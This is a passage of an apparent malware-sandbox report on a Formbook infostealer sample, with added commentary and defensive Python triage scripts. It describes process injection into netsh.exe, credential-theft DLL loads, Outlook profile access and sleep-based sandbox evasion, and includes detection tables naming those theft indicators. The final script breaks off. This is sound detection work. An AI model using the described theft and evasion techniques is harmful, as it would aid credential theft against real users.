            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: version.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: userenv.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netutils.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wldp.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: profapi.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: secur32.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mlang.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: propsys.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winsqlite3.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptbase.dll
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeSection loaded: wininet.dll
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeSection loaded: mswsock.dll
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeSection loaded: dnsapi.dll
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeSection loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeSection loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeSection loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: C:\Windows\SysWOW64\netsh.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
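The process chain and module loads above, read together, are the Formbook execution pattern: the sample relaunches itself (RunPE into a suspended copy, cf. the UpdatedRunpe PDB path a few lines below), the injected code starts netsh.exe with no arguments purely as a host, and that netsh.exe then loads winsqlite3.dll, vaultcli.dll and dpapi.dll, opens the Outlook profile key and launches Firefox, none of which a network-configuration tool does on its own (the CREATE TABLE password_notes string found in its memory is the schema of Chrome's Login Data database, which explains the SQLite load). One caveat when reading the tree: netsh.exe's parent, jBaxmaKIzqHZYEOPQcTTJTXx.exe, carries the PDB path R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb, so it is Joe Sandbox's own fake-browser decoy rather than a file the sample dropped; the Formbook Yara hits in its memory show the sample injected into it, and the netsh.exe launch is the injected code's doing. The script below is an added example, not code from the report or from Joe Sandbox: it parses the lines above exactly as printed and applies those rules. The tool and browser name sets, the DLL table and the wording of the findings are my own assumptions.

```python
"""Triage of the process chain and module loads printed in the report above.
Added example for this report; not Joe Sandbox code."""
import re
from collections import defaultdict
from ntpath import basename   # Windows path semantics on any host

# Lines copied from the report above (the sandbox fuses the source column onto
# the event name, which the regex below relies on).
REPORT_LINES = r"""
Source: unknownProcess created: C:\Users\user\Desktop\yZcecBUXN7.exe "C:\Users\user\Desktop\yZcecBUXN7.exe"
Source: C:\Users\user\Desktop\yZcecBUXN7.exeProcess created: C:\Users\user\Desktop\yZcecBUXN7.exe "C:\Users\user\Desktop\yZcecBUXN7.exe"
Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\SysWOW64\netsh.exe"
Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winsqlite3.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: vaultcli.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dpapi.dll
Source: C:\Windows\SysWOW64\netsh.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
"""

EVENT_RE = re.compile(r"^Source: (?P<src>.+?)"
                      r"(?P<event>Process created|Section loaded|Key opened|File read): "
                      r"(?P<detail>.*)$")

# Assumed rule tables (illustrative subsets, not complete lists).
SYSTEM_TOOLS = {"netsh.exe", "explorer.exe", "svchost.exe", "cmd.exe", "wscript.exe"}
BROWSERS = {"firefox.exe", "chrome.exe", "msedge.exe", "iexplore.exe"}
CREDENTIAL_DLLS = {
    "winsqlite3.dll": "SQLite reader for browser Login Data / cookies",
    "vaultcli.dll": "Windows Credential Manager vault access",
    "dpapi.dll": "DPAPI, needed to decrypt saved browser and mail secrets",
}


def parse_events(text):
    """Return (source, event, detail) triples for the event types used here."""
    events = []
    for line in text.splitlines():
        m = EVENT_RE.match(line.strip())
        if m:
            events.append((m["src"], m["event"], m["detail"]))
    return events


def process_tree(events):
    """Map parent image path -> [(child image path, child command line)]."""
    tree = defaultdict(list)
    for src, event, detail in events:
        if event == "Process created":
            image, sep, rest = detail.partition(' "')
            tree[src].append((image, '"' + rest if sep else ""))
    return dict(tree)


def has_arguments(cmdline):
    """True if anything follows the (possibly quoted) program path."""
    cmdline = cmdline.strip()
    if cmdline.startswith('"'):
        end = cmdline.find('"', 1)
        rest = cmdline[end + 1:] if end != -1 else ""
    else:
        rest = cmdline.partition(" ")[2]
    return bool(rest.strip())


def triage_process_chain(text):
    """Apply the rules described in the lead-in; returns readable findings."""
    events = parse_events(text)
    findings = []
    for parent, children in process_tree(events).items():
        p = basename(parent).lower()
        for image, cmdline in children:
            c = basename(image).lower()
            if parent.lower() == image.lower():
                findings.append(f"self-spawn {c}: RunPE/hollowing candidate")
            if c in SYSTEM_TOOLS and not has_arguments(cmdline):
                findings.append(f"{c} started without arguments by {p}: injection host candidate")
            if c in BROWSERS and p in SYSTEM_TOOLS:
                findings.append(f"{p} launched {c}: credential-harvest trigger")
    for src, event, detail in events:
        s = basename(src).lower()
        if s not in SYSTEM_TOOLS:
            continue
        if event == "Section loaded" and detail.lower() in CREDENTIAL_DLLS:
            findings.append(f"{s} loaded {detail}: {CREDENTIAL_DLLS[detail.lower()]}")
        if event == "Key opened" and "\\outlook\\profiles" in detail.lower():
            findings.append(f"{s} opened Outlook profile key: mail credential theft")
    return findings


if __name__ == "__main__":
    for finding in triage_process_chain(REPORT_LINES):
        print(finding)
```

On the report's own lines this yields seven findings: the self-spawn, netsh.exe started without arguments, the Firefox launch from netsh.exe, the three credential-access DLL loads and the Outlook profile key. The "no arguments" rule is the one worth carrying into production detection: netsh.exe is never launched bare by legitimate automation, so a parent that is not a console and a command line equal to the image path is a high-confidence injection-host signal regardless of which malware family does it.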
            Source: yZcecBUXN7.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: yZcecBUXN7.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: C:\Users\GT350\source\repos\UpdatedRunpe\UpdatedRunpe\obj\x86\Debug\AQipUvwTwkLZyiCs.pdb source: yZcecBUXN7.exe, 00000000.00000002.1628173538.0000000005330000.00000004.08000000.00040000.00000000.sdmp, yZcecBUXN7.exe, 00000000.00000002.1626818477.0000000002A71000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: netsh.pdb source: yZcecBUXN7.exe, 00000001.00000002.1898532114.0000000000E28000.00000004.00000020.00020000.00000000.sdmp, yZcecBUXN7.exe, 00000001.00000002.1898532114.0000000000E41000.00000004.00000020.00020000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000002.00000002.4123319938.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000002.00000002.4123319938.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000002.00000000.1770920776.000000000004E000.00000002.00000001.01000000.00000007.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000000.1972232269.000000000004E000.00000002.00000001.01000000.00000007.sdmp
            Source: Binary string: wntdll.pdbUGP source: yZcecBUXN7.exe, 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000004.00000003.1897494718.0000000001227000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124173069.00000000038DE000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124173069.0000000003740000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000004.00000003.1902030596.000000000358C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: netsh.pdbGCTL source: yZcecBUXN7.exe, 00000001.00000002.1898532114.0000000000E28000.00000004.00000020.00020000.00000000.sdmp, yZcecBUXN7.exe, 00000001.00000002.1898532114.0000000000E41000.00000004.00000020.00020000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000002.00000002.4123319938.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000002.00000002.4123319938.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: yZcecBUXN7.exe, yZcecBUXN7.exe, 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, netsh.exe, 00000004.00000003.1897494718.0000000001227000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124173069.00000000038DE000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124173069.0000000003740000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000004.00000003.1902030596.000000000358C000.00000004.00000020.00020000.00000000.sdmp
            Source: yZcecBUXN7.exeStatic PE information: 0xCA00A32F [Sun May 23 23:50:07 2077 UTC]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0041A0EC push esi; retf
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0041133C push esp; retf
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_00408397 push esp; iretd
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_00413551 push eax; ret
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_004035E0 push eax; ret
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_00404E45 push ds; iretd
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_00404E1C push ds; iretd
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_00404E23 push ds; iretd
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_00404ECD push ds; iretd
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_004186EA push ebx; ret
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_010D225F pushad ; ret
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_010D27FA pushad ; ret
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011009AD push ecx; mov dword ptr [esp], ecx
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_010D283D push eax; iretd
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_010D1368 push eax; iretd
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037709AD push ecx; mov dword ptr [esp], ecx
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_03741350 push eax; iretd
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00C16B14 push esi; retf
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00C1CB14 push eax; iretd
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00C04DB4 push esp; iretd
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00C1B1BD push 00000049h; iretd
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00C018EA push ds; iretd
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00C01840 push ds; iretd
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00C01862 push ds; iretd
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00C01839 push ds; iretd
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00C0D957 push ebx; retf
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00C0FB80 push edi; iretd
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00C11D56 push ds; ret
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00C0DD59 push esp; retf
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00C0FF6E push eax; ret
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00C1FF2B push esi; retf
            Source: yZcecBUXN7.exeStatic PE information: section name: .text entropy: 7.633926656601929
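Two of the static flags above, the 0xCA00A32F link timestamp (which decodes to 23 May 2077) and the .text entropy of 7.63 bits per byte, are cheap to reproduce. One caveat before treating the timestamp as evidence: this is a .NET assembly, and Roslyn's deterministic builds, which current .NET SDK projects enable by default, write a content hash into TimeDateStamp with the top bit set, so managed binaries routinely carry link dates after January 2038 while being perfectly benign. The entropy is the stronger signal here: IL plus metadata normally sits well below 7 bits per byte, and 7.63 fits an encrypted embedded payload, which is consistent with the TransformFinalBlock call in DarkListView.cs and the two unpacked PE images the Yara matches above were taken from. The script below is an added example, not code from the report or from Joe Sandbox: it assembles a minimal constructed PE carrying the report's timestamp and a constructed random .text section, parses the COFF header and section table, and applies both checks. The 7.0 entropy threshold, the sample sizes and the helper names are my assumptions.

```python
"""Static checks behind two of the flags above: the 0xCA00A32F link timestamp
and the 7.63-bit .text entropy. Added example; the PE bytes are constructed."""
import math
import random
import struct
from datetime import datetime, timezone

REPORT_TIMESTAMP = 0xCA00A32F        # TimeDateStamp printed in the report
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000


def build_minimal_pe(timestamp, text_bytes):
    """Constructed stand-in for a sample: DOS header, PE signature, COFF header,
    a zeroed PE32 optional header and one .text section holding text_bytes."""
    e_lfanew = 0x80
    dos = (b"MZ" + b"\x00" * 58 + struct.pack("<I", e_lfanew)).ljust(e_lfanew, b"\x00")
    size_opt = 0xE0                                    # PE32 optional header size
    coff = struct.pack("<HHIIIHH", 0x14C, 1, timestamp, 0, 0, size_opt, 0x0102)
    raw_off = e_lfanew + 4 + 20 + size_opt + 40        # first byte after the section table
    flags = IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ
    section = struct.pack("<8sIIIIIIHHI", b".text", len(text_bytes), 0x1000,
                          len(text_bytes), raw_off, 0, 0, 0, 0, flags)
    return dos + b"PE\x00\x00" + coff + b"\x00" * size_opt + section + text_bytes


def parse_pe(data):
    """Return (TimeDateStamp, [(section name, raw bytes, characteristics)])."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("PE signature not found")
    coff_off = e_lfanew + 4
    _, nsec, ts, _, _, size_opt, _ = struct.unpack_from("<HHIIIHH", data, coff_off)
    sec_off = coff_off + 20 + size_opt
    sections = []
    for i in range(nsec):
        name, _, _, raw_size, raw_ptr, _, _, _, _, flags = struct.unpack_from(
            "<8sIIIIIIHHI", data, sec_off + 40 * i)
        name = name.rstrip(b"\x00").decode("ascii", "replace")
        sections.append((name, data[raw_ptr:raw_ptr + raw_size], flags))
    return ts, sections


def shannon_entropy(blob):
    """Bits per byte: 0.0 for a constant run, approaching 8.0 for random data."""
    if not blob:
        return 0.0
    counts = [0] * 256
    for b in blob:
        counts[b] += 1
    n = len(blob)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def timestamp_verdict(ts, now_ts=None):
    """Return (formatted link time, verdict). now_ts is Unix time; defaults to the clock."""
    if now_ts is None:
        now_ts = datetime.now(timezone.utc).timestamp()
    when = datetime.fromtimestamp(ts, timezone.utc)
    stamp = when.strftime("%Y-%m-%d %H:%M:%S UTC")
    if ts > now_ts:
        return stamp, "suspicious: link time is in the future"
    if when.year < 1993:                      # no PE files existed before 1993
        return stamp, "suspicious: link time predates the PE format"
    return stamp, "plausible"


def triage_static(pe_bytes, now_ts=None, entropy_threshold=7.0):
    """Both checks as an analyst would apply them to the report's numbers."""
    ts, sections = parse_pe(pe_bytes)
    stamp, verdict = timestamp_verdict(ts, now_ts)
    report = {"link_time": stamp, "link_time_verdict": verdict, "sections": {}}
    for name, raw, flags in sections:
        ent = shannon_entropy(raw)
        executable = bool(flags & IMAGE_SCN_MEM_EXECUTE)
        report["sections"][name] = {
            "entropy": round(ent, 3),
            "executable": executable,
            # native code and .NET IL normally sit well below 7 bits/byte;
            # above that in an executable section means packed/encrypted data
            "packed_or_encrypted": executable and ent > entropy_threshold,
        }
    return report


# Constructed inputs: a random .text (stands in for an encrypted payload) and a
# NOP sled, linked at the report's timestamp and at a plausible mid-2020 one.
_rng = random.Random(7)
HIGH_ENTROPY_TEXT = bytes(_rng.getrandbits(8) for _ in range(4096))
LOW_ENTROPY_TEXT = b"\x90" * 4096
SAMPLE_PE = build_minimal_pe(REPORT_TIMESTAMP, HIGH_ENTROPY_TEXT)
BENIGN_PE = build_minimal_pe(0x5F000000, LOW_ENTROPY_TEXT)
NOW_2024 = 1714521600                           # 2024-05-01 00:00:00 UTC

if __name__ == "__main__":
    import json
    print(json.dumps(triage_static(SAMPLE_PE, NOW_2024), indent=2))
```

The parser deliberately reads only the COFF header and the section table, which is all either check needs and is robust to the zeroed optional header of the constructed sample; on a real file the same code works unchanged because it locates the section table through SizeOfOptionalHeader rather than assuming PE32.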

            Hooking and other Techniques for Hiding and Protection

            Source: C:\Windows\SysWOW64\netsh.exeFile deleted: c:\users\user\desktop\yzcecbuxn7.exe
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: Yara matchFile source: Process Memory Space: yZcecBUXN7.exe PID: 6640, type: MEMORYSTR
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeMemory allocated: CC0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeMemory allocated: 2A70000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeMemory allocated: 4A70000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0114096E rdtsc
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_00401D30 sldt word ptr [eax]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\netsh.exeWindow / User API: threadDelayed 1723
            Source: C:\Windows\SysWOW64\netsh.exeWindow / User API: threadDelayed 8248
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\netsh.exeAPI coverage: 2.3 %
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe TID: 6744Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\netsh.exe TID: 3716Thread sleep count: 1723 > 30
            Source: C:\Windows\SysWOW64\netsh.exe TID: 3716Thread sleep time: -3446000s >= -30000s
            Source: C:\Windows\SysWOW64\netsh.exe TID: 3716Thread sleep count: 8248 > 30
            Source: C:\Windows\SysWOW64\netsh.exe TID: 3716Thread sleep time: -16496000s >= -30000s
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe TID: 2724Thread sleep time: -75000s >= -30000s
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe TID: 2724Thread sleep count: 31 > 30
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe TID: 2724Thread sleep time: -46500s >= -30000s
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe TID: 2724Thread sleep count: 37 > 30
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe TID: 2724Thread sleep time: -37000s >= -30000s
            Source: C:\Windows\SysWOW64\netsh.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\netsh.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00C1B710 FindFirstFileW,FindNextFileW,FindClose,
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeThread delayed: delay time: 922337203685477
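The sleep figures above are milliseconds despite the "s" suffix: 1723 calls totalling 3,446,000 and 8,248 calls totalling 16,496,000 both work out to exactly 2,000 ms per call, so the injected netsh.exe requested about 5.5 hours of delay in a single thread, and the parent's one request of 922,337,203,685,477 ms is TimeSpan.MaxValue (2^63 ticks of 100 ns) expressed in milliseconds, a sleep that never returns unless the sandbox shortens it. The leading minus sign is the NT convention for a relative interval. The script below is an added example, not code from the report or from Joe Sandbox: it parses these lines, pairs each "sleep count" with the "sleep time" that follows it for the same thread to recover the per-call interval, and flags threads that exceed the 30 s budget the report prints or that ask for an effectively infinite sleep. The regex, the field names and the verdict wording are my own.

```python
"""Sleep-evasion triage over the "Thread sleep" lines printed above.
Added example for this report; not Joe Sandbox code."""
import re
from collections import defaultdict
from ntpath import basename

# Lines copied from the report above; values are milliseconds (see lead-in).
REPORT_SLEEP_LINES = r"""
Source: C:\Users\user\Desktop\yZcecBUXN7.exe TID: 6744Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\netsh.exe TID: 3716Thread sleep count: 1723 > 30
Source: C:\Windows\SysWOW64\netsh.exe TID: 3716Thread sleep time: -3446000s >= -30000s
Source: C:\Windows\SysWOW64\netsh.exe TID: 3716Thread sleep count: 8248 > 30
Source: C:\Windows\SysWOW64\netsh.exe TID: 3716Thread sleep time: -16496000s >= -30000s
Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe TID: 2724Thread sleep time: -75000s >= -30000s
Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe TID: 2724Thread sleep count: 31 > 30
Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe TID: 2724Thread sleep time: -46500s >= -30000s
Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe TID: 2724Thread sleep count: 37 > 30
Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe TID: 2724Thread sleep time: -37000s >= -30000s
"""

SLEEP_RE = re.compile(r"^Source: (?P<proc>.+?) TID: (?P<tid>\d+)"
                      r"Thread sleep (?P<kind>count|time): -?(?P<value>\d+)s? >=? -?\d+")

TIMESPAN_MAX_MS = (2**63 - 1) // 10_000   # .NET TimeSpan.MaxValue in milliseconds
SANDBOX_BUDGET_MS = 30_000                # the threshold the report prints (-30000s)


def parse_sleep_events(text):
    """Yield (process basename, tid, kind, value_ms) in report order."""
    for line in text.splitlines():
        m = SLEEP_RE.match(line.strip())
        if m:
            yield basename(m["proc"]), int(m["tid"]), m["kind"], int(m["value"])


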